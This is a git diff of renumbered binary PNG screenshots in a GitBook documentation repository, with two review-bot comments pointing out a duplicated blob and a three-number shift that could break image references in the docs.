Binary files a/.gitbook/assets/image (1131).png and b/.gitbook/assets/image (1131).png differ
diff --git a/.gitbook/assets/image (1132).png b/.gitbook/assets/image (1132).png
index 786ef2095..8a1b60ffe 100644
Binary files a/.gitbook/assets/image (1132).png and b/.gitbook/assets/image (1132).png differ
diff --git a/.gitbook/assets/image (1133).png b/.gitbook/assets/image (1133).png
index 72a70e974..955989eef 100644
Binary files a/.gitbook/assets/image (1133).png and b/.gitbook/assets/image (1133).png differ
diff --git a/.gitbook/assets/image (1134).png b/.gitbook/assets/image (1134).png
index afcc62435..1dfc47c3b 100644
Binary files a/.gitbook/assets/image (1134).png and b/.gitbook/assets/image (1134).png differ
diff --git a/.gitbook/assets/image (1135).png b/.gitbook/assets/image (1135).png
index 014386c94..786ef2095 100644
Binary files a/.gitbook/assets/image (1135).png and b/.gitbook/assets/image (1135).png differ
diff --git a/.gitbook/assets/image (1136).png b/.gitbook/assets/image (1136).png
index e872c3391..72a70e974 100644
Binary files a/.gitbook/assets/image (1136).png and b/.gitbook/assets/image (1136).png differ
diff --git a/.gitbook/assets/image (1137).png b/.gitbook/assets/image (1137).png
index e872c3391..afcc62435 100644
Binary files a/.gitbook/assets/image (1137).png and b/.gitbook/assets/image (1137).png differ
diff --git a/.gitbook/assets/image (1138).png b/.gitbook/assets/image (1138).png
index f3845061c..014386c94 100644
Binary files a/.gitbook/assets/image (1138).png and b/.gitbook/assets/image (1138).png differ
diff --git a/.gitbook/assets/image (1139).png b/.gitbook/assets/image (1139).png
index 9d51da1d4..e872c3391 100644
Binary files a/.gitbook/assets/image (1139).png and b/.gitbook/assets/image (1139).png differ
diff --git a/.gitbook/assets/image (114).png b/.gitbook/assets/image (114).png
index 698fcfc9e..d56929629 100644
Binary files a/.gitbook/assets/image (114).png and b/.gitbook/assets/image (114).png differ
diff --git a/.gitbook/assets/image (1140).png b/.gitbook/assets/image (1140).png
index 1b729cfa6..e872c3391 100644
Binary files a/.gitbook/assets/image (1140).png and b/.gitbook/assets/image (1140).png differ
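Review bot: image (1139).png and image (1140).png both end up at blob e872c3391 after this change, the same blob that image (1136).png and image (1137).png shared before it, so one screenshot is tracked under two names. If both names are referenced from the docs, point them at a single asset; if only one is, drop the other so the renumbering does not keep carrying a duplicate forward.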
diff --git a/.gitbook/assets/image (1141).png b/.gitbook/assets/image (1141).png
index 057934603..f3845061c 100644
Binary files a/.gitbook/assets/image (1141).png and b/.gitbook/assets/image (1141).png differ
diff --git a/.gitbook/assets/image (1142).png b/.gitbook/assets/image (1142).png
index daad2fb22..9d51da1d4 100644
Binary files a/.gitbook/assets/image (1142).png and b/.gitbook/assets/image (1142).png differ
diff --git a/.gitbook/assets/image (1143).png b/.gitbook/assets/image (1143).png
index a75850811..1b729cfa6 100644
Binary files a/.gitbook/assets/image (1143).png and b/.gitbook/assets/image (1143).png differ
diff --git a/.gitbook/assets/image (1144).png b/.gitbook/assets/image (1144).png
index f34717d97..057934603 100644
Binary files a/.gitbook/assets/image (1144).png and b/.gitbook/assets/image (1144).png differ
diff --git a/.gitbook/assets/image (1145).png b/.gitbook/assets/image (1145).png
index c566d0ca8..daad2fb22 100644
Binary files a/.gitbook/assets/image (1145).png and b/.gitbook/assets/image (1145).png differ
diff --git a/.gitbook/assets/image (1146).png b/.gitbook/assets/image (1146).png
index f3336397f..a75850811 100644
Binary files a/.gitbook/assets/image (1146).png and b/.gitbook/assets/image (1146).png differ
diff --git a/.gitbook/assets/image (1147).png b/.gitbook/assets/image (1147).png
index 792d07b42..f34717d97 100644
Binary files a/.gitbook/assets/image (1147).png and b/.gitbook/assets/image (1147).png differ
diff --git a/.gitbook/assets/image (1148).png b/.gitbook/assets/image (1148).png
index fe0c0ac0a..c566d0ca8 100644
Binary files a/.gitbook/assets/image (1148).png and b/.gitbook/assets/image (1148).png differ
diff --git a/.gitbook/assets/image (1149).png b/.gitbook/assets/image (1149).png
index bd35287e2..f3336397f 100644
Binary files a/.gitbook/assets/image (1149).png and b/.gitbook/assets/image (1149).png differ
diff --git a/.gitbook/assets/image (115).png b/.gitbook/assets/image (115).png
index c2591f90f..8aeeb8354 100644
Binary files a/.gitbook/assets/image (115).png and b/.gitbook/assets/image (115).png differ
diff --git a/.gitbook/assets/image (1150).png b/.gitbook/assets/image (1150).png
index 66fe00d48..792d07b42 100644
Binary files a/.gitbook/assets/image (1150).png and b/.gitbook/assets/image (1150).png differ
diff --git a/.gitbook/assets/image (1151).png b/.gitbook/assets/image (1151).png
index ff5c2bae1..fe0c0ac0a 100644
Binary files a/.gitbook/assets/image (1151).png and b/.gitbook/assets/image (1151).png differ
diff --git a/.gitbook/assets/image (1152).png b/.gitbook/assets/image (1152).png
index 0c21623d2..bd35287e2 100644
Binary files a/.gitbook/assets/image (1152).png and b/.gitbook/assets/image (1152).png differ
diff --git a/.gitbook/assets/image (1153).png b/.gitbook/assets/image (1153).png
index 461c9627d..66fe00d48 100644
Binary files a/.gitbook/assets/image (1153).png and b/.gitbook/assets/image (1153).png differ
diff --git a/.gitbook/assets/image (1154).png b/.gitbook/assets/image (1154).png
index a4444b442..ff5c2bae1 100644
Binary files a/.gitbook/assets/image (1154).png and b/.gitbook/assets/image (1154).png differ
diff --git a/.gitbook/assets/image (1155).png b/.gitbook/assets/image (1155).png
index 7fbd3ba51..0c21623d2 100644
Binary files a/.gitbook/assets/image (1155).png and b/.gitbook/assets/image (1155).png differ
diff --git a/.gitbook/assets/image (1156).png b/.gitbook/assets/image (1156).png
index f43bee669..461c9627d 100644
Binary files a/.gitbook/assets/image (1156).png and b/.gitbook/assets/image (1156).png differ
diff --git a/.gitbook/assets/image (1157).png b/.gitbook/assets/image (1157).png
index be0bf70c1..a4444b442 100644
Binary files a/.gitbook/assets/image (1157).png and b/.gitbook/assets/image (1157).png differ
diff --git a/.gitbook/assets/image (1158).png b/.gitbook/assets/image (1158).png
index be0bf70c1..7fbd3ba51 100644
Binary files a/.gitbook/assets/image (1158).png and b/.gitbook/assets/image (1158).png differ
diff --git a/.gitbook/assets/image (1159).png b/.gitbook/assets/image (1159).png
index 63e406af6..f43bee669 100644
Binary files a/.gitbook/assets/image (1159).png and b/.gitbook/assets/image (1159).png differ
diff --git a/.gitbook/assets/image (116).png b/.gitbook/assets/image (116).png
index c7a07caac..9a74fb3f3 100644
Binary files a/.gitbook/assets/image (116).png and b/.gitbook/assets/image (116).png differ
diff --git a/.gitbook/assets/image (1160).png b/.gitbook/assets/image (1160).png
index 7fa96fc07..be0bf70c1 100644
Binary files a/.gitbook/assets/image (1160).png and b/.gitbook/assets/image (1160).png differ
diff --git a/.gitbook/assets/image (1161).png b/.gitbook/assets/image (1161).png
index 03f6a138d..be0bf70c1 100644
Binary files a/.gitbook/assets/image (1161).png and b/.gitbook/assets/image (1161).png differ
diff --git a/.gitbook/assets/image (1162).png b/.gitbook/assets/image (1162).png
index 46e4a0c83..63e406af6 100644
Binary files a/.gitbook/assets/image (1162).png and b/.gitbook/assets/image (1162).png differ
diff --git a/.gitbook/assets/image (1163).png b/.gitbook/assets/image (1163).png
index 883a9665d..7fa96fc07 100644
Binary files a/.gitbook/assets/image (1163).png and b/.gitbook/assets/image (1163).png differ
diff --git a/.gitbook/assets/image (1164).png b/.gitbook/assets/image (1164).png
index 04b275416..03f6a138d 100644
Binary files a/.gitbook/assets/image (1164).png and b/.gitbook/assets/image (1164).png differ
diff --git a/.gitbook/assets/image (1165).png b/.gitbook/assets/image (1165).png
index dde297c56..46e4a0c83 100644
Binary files a/.gitbook/assets/image (1165).png and b/.gitbook/assets/image (1165).png differ
diff --git a/.gitbook/assets/image (1166).png b/.gitbook/assets/image (1166).png
index 64d3e5b2b..883a9665d 100644
Binary files a/.gitbook/assets/image (1166).png and b/.gitbook/assets/image (1166).png differ
diff --git a/.gitbook/assets/image (1167).png b/.gitbook/assets/image (1167).png
index 3ab03424c..04b275416 100644
Binary files a/.gitbook/assets/image (1167).png and b/.gitbook/assets/image (1167).png differ
diff --git a/.gitbook/assets/image (1168).png b/.gitbook/assets/image (1168).png
index 2eff00bfc..dde297c56 100644
Binary files a/.gitbook/assets/image (1168).png and b/.gitbook/assets/image (1168).png differ
diff --git a/.gitbook/assets/image (1169).png b/.gitbook/assets/image (1169).png
index 9288bbe21..64d3e5b2b 100644
Binary files a/.gitbook/assets/image (1169).png and b/.gitbook/assets/image (1169).png differ
diff --git a/.gitbook/assets/image (117).png b/.gitbook/assets/image (117).png
index 2419d5418..698fcfc9e 100644
Binary files a/.gitbook/assets/image (117).png and b/.gitbook/assets/image (117).png differ
diff --git a/.gitbook/assets/image (1170).png b/.gitbook/assets/image (1170).png
index 4f13161c3..3ab03424c 100644
Binary files a/.gitbook/assets/image (1170).png and b/.gitbook/assets/image (1170).png differ
diff --git a/.gitbook/assets/image (1171).png b/.gitbook/assets/image (1171).png
index cd027ceda..2eff00bfc 100644
Binary files a/.gitbook/assets/image (1171).png and b/.gitbook/assets/image (1171).png differ
diff --git a/.gitbook/assets/image (1172).png b/.gitbook/assets/image (1172).png
index 67050294c..9288bbe21 100644
Binary files a/.gitbook/assets/image (1172).png and b/.gitbook/assets/image (1172).png differ
diff --git a/.gitbook/assets/image (1173).png b/.gitbook/assets/image (1173).png
index fc9d9f99d..4f13161c3 100644
Binary files a/.gitbook/assets/image (1173).png and b/.gitbook/assets/image (1173).png differ
diff --git a/.gitbook/assets/image (1174).png b/.gitbook/assets/image (1174).png
index ad2301b73..cd027ceda 100644
Binary files a/.gitbook/assets/image (1174).png and b/.gitbook/assets/image (1174).png differ
diff --git a/.gitbook/assets/image (1175).png b/.gitbook/assets/image (1175).png
index 295913e3a..67050294c 100644
Binary files a/.gitbook/assets/image (1175).png and b/.gitbook/assets/image (1175).png differ
diff --git a/.gitbook/assets/image (1176).png b/.gitbook/assets/image (1176).png
index 295913e3a..fc9d9f99d 100644
Binary files a/.gitbook/assets/image (1176).png and b/.gitbook/assets/image (1176).png differ
diff --git a/.gitbook/assets/image (1177).png b/.gitbook/assets/image (1177).png
index 074434342..ad2301b73 100644
Binary files a/.gitbook/assets/image (1177).png and b/.gitbook/assets/image (1177).png differ
diff --git a/.gitbook/assets/image (1178).png b/.gitbook/assets/image (1178).png
index 7981733f5..295913e3a 100644
Binary files a/.gitbook/assets/image (1178).png and b/.gitbook/assets/image (1178).png differ
diff --git a/.gitbook/assets/image (1179).png b/.gitbook/assets/image (1179).png
index 5a4616207..295913e3a 100644
Binary files a/.gitbook/assets/image (1179).png and b/.gitbook/assets/image (1179).png differ
diff --git a/.gitbook/assets/image (118).png b/.gitbook/assets/image (118).png
index c7ca19b12..c2591f90f 100644
Binary files a/.gitbook/assets/image (118).png and b/.gitbook/assets/image (118).png differ
diff --git a/.gitbook/assets/image (1180).png b/.gitbook/assets/image (1180).png
index 0deb44652..074434342 100644
Binary files a/.gitbook/assets/image (1180).png and b/.gitbook/assets/image (1180).png differ
diff --git a/.gitbook/assets/image (1181).png b/.gitbook/assets/image (1181).png
index 0deb44652..7981733f5 100644
Binary files a/.gitbook/assets/image (1181).png and b/.gitbook/assets/image (1181).png differ
diff --git a/.gitbook/assets/image (1182).png b/.gitbook/assets/image (1182).png
index 489551a70..5a4616207 100644
Binary files a/.gitbook/assets/image (1182).png and b/.gitbook/assets/image (1182).png differ
diff --git a/.gitbook/assets/image (1183).png b/.gitbook/assets/image (1183).png
index 835e4fa9b..0deb44652 100644
Binary files a/.gitbook/assets/image (1183).png and b/.gitbook/assets/image (1183).png differ
diff --git a/.gitbook/assets/image (1184).png b/.gitbook/assets/image (1184).png
index 7a27f030b..0deb44652 100644
Binary files a/.gitbook/assets/image (1184).png and b/.gitbook/assets/image (1184).png differ
diff --git a/.gitbook/assets/image (1185).png b/.gitbook/assets/image (1185).png
index 71aca922c..489551a70 100644
Binary files a/.gitbook/assets/image (1185).png and b/.gitbook/assets/image (1185).png differ
diff --git a/.gitbook/assets/image (1186).png b/.gitbook/assets/image (1186).png
index a23376cf4..835e4fa9b 100644
Binary files a/.gitbook/assets/image (1186).png and b/.gitbook/assets/image (1186).png differ
diff --git a/.gitbook/assets/image (1187).png b/.gitbook/assets/image (1187).png
index 635ddedaf..7a27f030b 100644
Binary files a/.gitbook/assets/image (1187).png and b/.gitbook/assets/image (1187).png differ
diff --git a/.gitbook/assets/image (1188).png b/.gitbook/assets/image (1188).png
index 052d32165..71aca922c 100644
Binary files a/.gitbook/assets/image (1188).png and b/.gitbook/assets/image (1188).png differ
diff --git a/.gitbook/assets/image (1189).png b/.gitbook/assets/image (1189).png
index cfe9a62d4..a23376cf4 100644
Binary files a/.gitbook/assets/image (1189).png and b/.gitbook/assets/image (1189).png differ
diff --git a/.gitbook/assets/image (119).png b/.gitbook/assets/image (119).png
index 819abbc22..c7a07caac 100644
Binary files a/.gitbook/assets/image (119).png and b/.gitbook/assets/image (119).png differ
diff --git a/.gitbook/assets/image (1190).png b/.gitbook/assets/image (1190).png
index 514b29a12..635ddedaf 100644
Binary files a/.gitbook/assets/image (1190).png and b/.gitbook/assets/image (1190).png differ
diff --git a/.gitbook/assets/image (1191).png b/.gitbook/assets/image (1191).png
index 55da1d380..052d32165 100644
Binary files a/.gitbook/assets/image (1191).png and b/.gitbook/assets/image (1191).png differ
diff --git a/.gitbook/assets/image (1192).png b/.gitbook/assets/image (1192).png
index 110f6b19c..cfe9a62d4 100644
Binary files a/.gitbook/assets/image (1192).png and b/.gitbook/assets/image (1192).png differ
diff --git a/.gitbook/assets/image (1193).png b/.gitbook/assets/image (1193).png
index c3669e1a2..514b29a12 100644
Binary files a/.gitbook/assets/image (1193).png and b/.gitbook/assets/image (1193).png differ
diff --git a/.gitbook/assets/image (1194).png b/.gitbook/assets/image (1194).png
index c31c79e9c..55da1d380 100644
Binary files a/.gitbook/assets/image (1194).png and b/.gitbook/assets/image (1194).png differ
diff --git a/.gitbook/assets/image (1195).png b/.gitbook/assets/image (1195).png
index 83d9b8f3b..110f6b19c 100644
Binary files a/.gitbook/assets/image (1195).png and b/.gitbook/assets/image (1195).png differ
diff --git a/.gitbook/assets/image (1196).png b/.gitbook/assets/image (1196).png
index 83d9b8f3b..c3669e1a2 100644
Binary files a/.gitbook/assets/image (1196).png and b/.gitbook/assets/image (1196).png differ
diff --git a/.gitbook/assets/image (1197).png b/.gitbook/assets/image (1197).png
index 23ab4ba8c..c31c79e9c 100644
Binary files a/.gitbook/assets/image (1197).png and b/.gitbook/assets/image (1197).png differ
diff --git a/.gitbook/assets/image (1198).png b/.gitbook/assets/image (1198).png
index bb28eba03..83d9b8f3b 100644
Binary files a/.gitbook/assets/image (1198).png and b/.gitbook/assets/image (1198).png differ
diff --git a/.gitbook/assets/image (1199).png b/.gitbook/assets/image (1199).png
index aeefed1e9..83d9b8f3b 100644
Binary files a/.gitbook/assets/image (1199).png and b/.gitbook/assets/image (1199).png differ
diff --git a/.gitbook/assets/image (12).png b/.gitbook/assets/image (12).png
index e0b33932e..1a985c3d4 100644
Binary files a/.gitbook/assets/image (12).png and b/.gitbook/assets/image (12).png differ
diff --git a/.gitbook/assets/image (120).png b/.gitbook/assets/image (120).png
index d3b3642bd..2419d5418 100644
Binary files a/.gitbook/assets/image (120).png and b/.gitbook/assets/image (120).png differ
diff --git a/.gitbook/assets/image (1200).png b/.gitbook/assets/image (1200).png
index 9baaeb0ff..23ab4ba8c 100644
Binary files a/.gitbook/assets/image (1200).png and b/.gitbook/assets/image (1200).png differ
diff --git a/.gitbook/assets/image (1201).png b/.gitbook/assets/image (1201).png
index e330a5982..bb28eba03 100644
Binary files a/.gitbook/assets/image (1201).png and b/.gitbook/assets/image (1201).png differ
diff --git a/.gitbook/assets/image (1202).png b/.gitbook/assets/image (1202).png
index 096c979f4..aeefed1e9 100644
Binary files a/.gitbook/assets/image (1202).png and b/.gitbook/assets/image (1202).png differ
diff --git a/.gitbook/assets/image (1203).png b/.gitbook/assets/image (1203).png
index 857c75045..9baaeb0ff 100644
Binary files a/.gitbook/assets/image (1203).png and b/.gitbook/assets/image (1203).png differ
diff --git a/.gitbook/assets/image (1204).png b/.gitbook/assets/image (1204).png
index db5113a11..e330a5982 100644
Binary files a/.gitbook/assets/image (1204).png and b/.gitbook/assets/image (1204).png differ
diff --git a/.gitbook/assets/image (1205).png b/.gitbook/assets/image (1205).png
index 4fab5fc91..096c979f4 100644
Binary files a/.gitbook/assets/image (1205).png and b/.gitbook/assets/image (1205).png differ
diff --git a/.gitbook/assets/image (1206).png b/.gitbook/assets/image (1206).png
index acc265687..857c75045 100644
Binary files a/.gitbook/assets/image (1206).png and b/.gitbook/assets/image (1206).png differ
diff --git a/.gitbook/assets/image (1207).png b/.gitbook/assets/image (1207).png
index 50cc9d21a..db5113a11 100644
Binary files a/.gitbook/assets/image (1207).png and b/.gitbook/assets/image (1207).png differ
diff --git a/.gitbook/assets/image (1208).png b/.gitbook/assets/image (1208).png
index 2b9922f39..4fab5fc91 100644
Binary files a/.gitbook/assets/image (1208).png and b/.gitbook/assets/image (1208).png differ
diff --git a/.gitbook/assets/image (1209).png b/.gitbook/assets/image (1209).png
index ef98334cf..acc265687 100644
Binary files a/.gitbook/assets/image (1209).png and b/.gitbook/assets/image (1209).png differ
diff --git a/.gitbook/assets/image (121).png b/.gitbook/assets/image (121).png
index 69f6170c5..c7ca19b12 100644
Binary files a/.gitbook/assets/image (121).png and b/.gitbook/assets/image (121).png differ
diff --git a/.gitbook/assets/image (1210).png b/.gitbook/assets/image (1210).png
index b076519e1..50cc9d21a 100644
Binary files a/.gitbook/assets/image (1210).png and b/.gitbook/assets/image (1210).png differ
diff --git a/.gitbook/assets/image (1211).png b/.gitbook/assets/image (1211).png
index 40d15d70e..2b9922f39 100644
Binary files a/.gitbook/assets/image (1211).png and b/.gitbook/assets/image (1211).png differ
diff --git a/.gitbook/assets/image (1212).png b/.gitbook/assets/image (1212).png
index 7f7a5dd95..ef98334cf 100644
Binary files a/.gitbook/assets/image (1212).png and b/.gitbook/assets/image (1212).png differ
diff --git a/.gitbook/assets/image (1213).png b/.gitbook/assets/image (1213).png
index b85eb6263..b076519e1 100644
Binary files a/.gitbook/assets/image (1213).png and b/.gitbook/assets/image (1213).png differ
diff --git a/.gitbook/assets/image (1214).png b/.gitbook/assets/image (1214).png
index fe29a4e4a..40d15d70e 100644
Binary files a/.gitbook/assets/image (1214).png and b/.gitbook/assets/image (1214).png differ
diff --git a/.gitbook/assets/image (1215).png b/.gitbook/assets/image (1215).png
index 361adf893..7f7a5dd95 100644
Binary files a/.gitbook/assets/image (1215).png and b/.gitbook/assets/image (1215).png differ
diff --git a/.gitbook/assets/image (1216).png b/.gitbook/assets/image (1216).png
index 5f92599c4..b85eb6263 100644
Binary files a/.gitbook/assets/image (1216).png and b/.gitbook/assets/image (1216).png differ
diff --git a/.gitbook/assets/image (1217).png b/.gitbook/assets/image (1217).png
index 7072ebc0b..fe29a4e4a 100644
Binary files a/.gitbook/assets/image (1217).png and b/.gitbook/assets/image (1217).png differ
diff --git a/.gitbook/assets/image (1218).png b/.gitbook/assets/image (1218).png
index 01f66cd07..361adf893 100644
Binary files a/.gitbook/assets/image (1218).png and b/.gitbook/assets/image (1218).png differ
diff --git a/.gitbook/assets/image (1219).png b/.gitbook/assets/image (1219).png
index de894aabc..5f92599c4 100644
Binary files a/.gitbook/assets/image (1219).png and b/.gitbook/assets/image (1219).png differ
diff --git a/.gitbook/assets/image (122).png b/.gitbook/assets/image (122).png
index 90ac64421..819abbc22 100644
Binary files a/.gitbook/assets/image (122).png and b/.gitbook/assets/image (122).png differ
diff --git a/.gitbook/assets/image (1220).png b/.gitbook/assets/image (1220).png
index 5d014a619..7072ebc0b 100644
Binary files a/.gitbook/assets/image (1220).png and b/.gitbook/assets/image (1220).png differ
diff --git a/.gitbook/assets/image (1221).png b/.gitbook/assets/image (1221).png
index e65ef8fd7..01f66cd07 100644
Binary files a/.gitbook/assets/image (1221).png and b/.gitbook/assets/image (1221).png differ
diff --git a/.gitbook/assets/image (1222).png b/.gitbook/assets/image (1222).png
index 241b71d29..de894aabc 100644
Binary files a/.gitbook/assets/image (1222).png and b/.gitbook/assets/image (1222).png differ
diff --git a/.gitbook/assets/image (1223).png b/.gitbook/assets/image (1223).png
index 843007838..5d014a619 100644
Binary files a/.gitbook/assets/image (1223).png and b/.gitbook/assets/image (1223).png differ
diff --git a/.gitbook/assets/image (1224).png b/.gitbook/assets/image (1224).png
index 878e43bb9..e65ef8fd7 100644
Binary files a/.gitbook/assets/image (1224).png and b/.gitbook/assets/image (1224).png differ
diff --git a/.gitbook/assets/image (1225).png b/.gitbook/assets/image (1225).png
index b0a1f83a4..241b71d29 100644
Binary files a/.gitbook/assets/image (1225).png and b/.gitbook/assets/image (1225).png differ
diff --git a/.gitbook/assets/image (1226).png b/.gitbook/assets/image (1226).png
index 66c23406f..843007838 100644
Binary files a/.gitbook/assets/image (1226).png and b/.gitbook/assets/image (1226).png differ
diff --git a/.gitbook/assets/image (1227).png b/.gitbook/assets/image (1227).png
index 47298f9e6..878e43bb9 100644
Binary files a/.gitbook/assets/image (1227).png and b/.gitbook/assets/image (1227).png differ
diff --git a/.gitbook/assets/image (1228).png b/.gitbook/assets/image (1228).png
index 2cb50f892..b0a1f83a4 100644
Binary files a/.gitbook/assets/image (1228).png and b/.gitbook/assets/image (1228).png differ
diff --git a/.gitbook/assets/image (1229).png b/.gitbook/assets/image (1229).png
index ffbd0b31e..66c23406f 100644
Binary files a/.gitbook/assets/image (1229).png and b/.gitbook/assets/image (1229).png differ
diff --git a/.gitbook/assets/image (123).png b/.gitbook/assets/image (123).png
index 298a2278a..d3b3642bd 100644
Binary files a/.gitbook/assets/image (123).png and b/.gitbook/assets/image (123).png differ
diff --git a/.gitbook/assets/image (1230).png b/.gitbook/assets/image (1230).png
index 49c6c459e..47298f9e6 100644
Binary files a/.gitbook/assets/image (1230).png and b/.gitbook/assets/image (1230).png differ
diff --git a/.gitbook/assets/image (1231).png b/.gitbook/assets/image (1231).png
index 545fcdfaf..2cb50f892 100644
Binary files a/.gitbook/assets/image (1231).png and b/.gitbook/assets/image (1231).png differ
diff --git a/.gitbook/assets/image (1232).png b/.gitbook/assets/image (1232).png
index a3ec7d605..ffbd0b31e 100644
Binary files a/.gitbook/assets/image (1232).png and b/.gitbook/assets/image (1232).png differ
diff --git a/.gitbook/assets/image (1233).png b/.gitbook/assets/image (1233).png
index 4d9c81fde..49c6c459e 100644
Binary files a/.gitbook/assets/image (1233).png and b/.gitbook/assets/image (1233).png differ
diff --git a/.gitbook/assets/image (1234).png b/.gitbook/assets/image (1234).png
index 21b3b1ba6..545fcdfaf 100644
Binary files a/.gitbook/assets/image (1234).png and b/.gitbook/assets/image (1234).png differ
diff --git a/.gitbook/assets/image (1235).png b/.gitbook/assets/image (1235).png
index 3fda80ffc..a3ec7d605 100644
Binary files a/.gitbook/assets/image (1235).png and b/.gitbook/assets/image (1235).png differ
diff --git a/.gitbook/assets/image (1236).png b/.gitbook/assets/image (1236).png
new file mode 100644
index 000000000..4d9c81fde
Binary files /dev/null and b/.gitbook/assets/image (1236).png differ
diff --git a/.gitbook/assets/image (1237).png b/.gitbook/assets/image (1237).png
new file mode 100644
index 000000000..21b3b1ba6
Binary files /dev/null and b/.gitbook/assets/image (1237).png differ
diff --git a/.gitbook/assets/image (1238).png b/.gitbook/assets/image (1238).png
new file mode 100644
index 000000000..3fda80ffc
Binary files /dev/null and b/.gitbook/assets/image (1238).png differ
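Review bot: The three files added here, image (1236).png to image (1238).png, carry blobs 4d9c81fde, 21b3b1ba6 and 3fda80ffc, which are the pre-change blobs of image (1233).png to image (1235).png, so this is not new artwork but the tail of a shift in which each existing name takes the content previously stored three numbers lower (image (1131).png now holds a00022f87, the old content of image (1128).png). Any Markdown reference to an `image (N).png` in this range will silently render a different screenshot unless the same commit rewrites those references, and the binary diff cannot show that. Confirm the reference updates are part of this change, or give the assets stable names so that inserting an image does not renumber the rest.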
diff --git a/.gitbook/assets/image (124).png b/.gitbook/assets/image (124).png
index 13cc62a1d..69f6170c5 100644
Binary files a/.gitbook/assets/image (124).png and b/.gitbook/assets/image (124).png differ
diff --git a/.gitbook/assets/image (125).png b/.gitbook/assets/image (125).png
index e4156b037..90ac64421 100644
Binary files a/.gitbook/assets/image (125).png and b/.gitbook/assets/image (125).png differ
diff --git a/.gitbook/assets/image (126).png b/.gitbook/assets/image (126).png
index bd3e75b5e..298a2278a 100644
Binary files a/.gitbook/assets/image (126).png and b/.gitbook/assets/image (126).png differ
diff --git a/.gitbook/assets/image (127).png b/.gitbook/assets/image (127).png
index 56cd17e02..13cc62a1d 100644
Binary files a/.gitbook/assets/image (127).png and b/.gitbook/assets/image (127).png differ
diff --git a/.gitbook/assets/image (128).png b/.gitbook/assets/image (128).png
index d79dfd964..e4156b037 100644
Binary files a/.gitbook/assets/image (128).png and b/.gitbook/assets/image (128).png differ
diff --git a/.gitbook/assets/image (129).png b/.gitbook/assets/image (129).png
index 6f7ed44d1..bd3e75b5e 100644
Binary files a/.gitbook/assets/image (129).png and b/.gitbook/assets/image (129).png differ
diff --git a/.gitbook/assets/image (13).png b/.gitbook/assets/image (13).png
index 354be02ad..cee86ab50 100644
Binary files a/.gitbook/assets/image (13).png and b/.gitbook/assets/image (13).png differ
diff --git a/.gitbook/assets/image (130).png b/.gitbook/assets/image (130).png
index 866daa163..56cd17e02 100644
Binary files a/.gitbook/assets/image (130).png and b/.gitbook/assets/image (130).png differ
diff --git a/.gitbook/assets/image (131).png b/.gitbook/assets/image (131).png
index 22f230860..d79dfd964 100644
Binary files a/.gitbook/assets/image (131).png and b/.gitbook/assets/image (131).png differ
diff --git a/.gitbook/assets/image (132).png b/.gitbook/assets/image (132).png
index 399703d5e..6f7ed44d1 100644
Binary files a/.gitbook/assets/image (132).png and b/.gitbook/assets/image (132).png differ
diff --git a/.gitbook/assets/image (133).png b/.gitbook/assets/image (133).png
index b7c4b1072..866daa163 100644
Binary files a/.gitbook/assets/image (133).png and b/.gitbook/assets/image (133).png differ
diff --git a/.gitbook/assets/image (134).png b/.gitbook/assets/image (134).png
index 28295f423..22f230860 100644
Binary files a/.gitbook/assets/image (134).png and b/.gitbook/assets/image (134).png differ
diff --git a/.gitbook/assets/image (135).png b/.gitbook/assets/image (135).png
index b2681ccdc..399703d5e 100644
Binary files a/.gitbook/assets/image (135).png and b/.gitbook/assets/image (135).png differ
diff --git a/.gitbook/assets/image (136).png b/.gitbook/assets/image (136).png
index 95d6ba326..b7c4b1072 100644
Binary files a/.gitbook/assets/image (136).png and b/.gitbook/assets/image (136).png differ
diff --git a/.gitbook/assets/image (137).png b/.gitbook/assets/image (137).png
index 7aa83ad45..28295f423 100644
Binary files a/.gitbook/assets/image (137).png and b/.gitbook/assets/image (137).png differ
diff --git a/.gitbook/assets/image (138).png b/.gitbook/assets/image (138).png
index 47dfb9bc8..b2681ccdc 100644
Binary files a/.gitbook/assets/image (138).png and b/.gitbook/assets/image (138).png differ
diff --git a/.gitbook/assets/image (139).png b/.gitbook/assets/image (139).png
index 14be92f20..95d6ba326 100644
Binary files a/.gitbook/assets/image (139).png and b/.gitbook/assets/image (139).png differ
diff --git a/.gitbook/assets/image (14).png b/.gitbook/assets/image (14).png
index 6856b34b8..e0b33932e 100644
Binary files a/.gitbook/assets/image (14).png and b/.gitbook/assets/image (14).png differ
diff --git a/.gitbook/assets/image (140).png b/.gitbook/assets/image (140).png
index c84297266..7aa83ad45 100644
Binary files a/.gitbook/assets/image (140).png and b/.gitbook/assets/image (140).png differ
diff --git a/.gitbook/assets/image (141).png b/.gitbook/assets/image (141).png
index d5587d1c4..47dfb9bc8 100644
Binary files a/.gitbook/assets/image (141).png and b/.gitbook/assets/image (141).png differ
diff --git a/.gitbook/assets/image (142).png b/.gitbook/assets/image (142).png
index 189c54def..14be92f20 100644
Binary files a/.gitbook/assets/image (142).png and b/.gitbook/assets/image (142).png differ
diff --git a/.gitbook/assets/image (143).png b/.gitbook/assets/image (143).png
index 0ec1adfc7..c84297266 100644
Binary files a/.gitbook/assets/image (143).png and b/.gitbook/assets/image (143).png differ
diff --git a/.gitbook/assets/image (144).png b/.gitbook/assets/image (144).png
index 8cb3b3d65..d5587d1c4 100644
Binary files a/.gitbook/assets/image (144).png and b/.gitbook/assets/image (144).png differ
diff --git a/.gitbook/assets/image (145).png b/.gitbook/assets/image (145).png
index ce5072c43..189c54def 100644
Binary files a/.gitbook/assets/image (145).png and b/.gitbook/assets/image (145).png differ
diff --git a/.gitbook/assets/image (146).png b/.gitbook/assets/image (146).png
index 33b0cd0a5..0ec1adfc7 100644
Binary files a/.gitbook/assets/image (146).png and b/.gitbook/assets/image (146).png differ
diff --git a/.gitbook/assets/image (147).png b/.gitbook/assets/image (147).png
index 7f0ce2044..8cb3b3d65 100644
Binary files a/.gitbook/assets/image (147).png and b/.gitbook/assets/image (147).png differ
diff --git a/.gitbook/assets/image (148).png b/.gitbook/assets/image (148).png
index 0d1d72092..ce5072c43 100644
Binary files a/.gitbook/assets/image (148).png and b/.gitbook/assets/image (148).png differ
diff --git a/.gitbook/assets/image (149).png b/.gitbook/assets/image (149).png
index 99b183e6a..33b0cd0a5 100644
Binary files a/.gitbook/assets/image (149).png and b/.gitbook/assets/image (149).png differ
diff --git a/.gitbook/assets/image (15).png b/.gitbook/assets/image (15).png
index ae8c5810e..e0b33932e 100644
Binary files a/.gitbook/assets/image (15).png and b/.gitbook/assets/image (15).png differ
diff --git a/.gitbook/assets/image (150).png b/.gitbook/assets/image (150).png
index 57bdc1613..7f0ce2044 100644
Binary files a/.gitbook/assets/image (150).png and b/.gitbook/assets/image (150).png differ
diff --git a/.gitbook/assets/image (151).png b/.gitbook/assets/image (151).png
